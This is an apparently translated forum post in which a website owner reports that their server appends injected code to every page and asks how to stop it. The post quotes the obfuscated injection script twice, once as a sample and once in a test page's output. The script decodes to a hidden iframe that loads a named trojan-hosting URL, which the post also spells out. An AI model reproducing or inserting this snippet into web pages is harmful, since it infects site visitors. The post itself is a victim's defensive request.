有我的网站的服务器上也有病毒。
病毒注入恶意代码
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
到所服务的每个页面上,并且它正在由 Apache 或类似的东西进行预处理,以将其添加到文件的末尾。
我创建了一个测试文件,代码如下:
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
</body>
</html>
它并不漂亮,但它达到了它的目的。
在浏览器中查看页面时,我得到
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
</body>
</html>
可以从 www.sagamountain.com/testfile.html 查看(警告,此页面已被感染)
我需要以编程方式停止该 div 和该脚本的执行,因为它是一个 iframe 到一个带有特洛伊木马的网站。HTML、CSS 或 JS,我只需要某种方法来阻止该 JS 执行。
它已经是 display:none 所以你看不到它,但是我怎样才能阻止 iframe 加载呢?
谢谢您的帮助!unescape 事情解析为http://ncccnnnc.cn/img/index.php的 iframe,这显然是我麻烦的根源。不要去那个网站!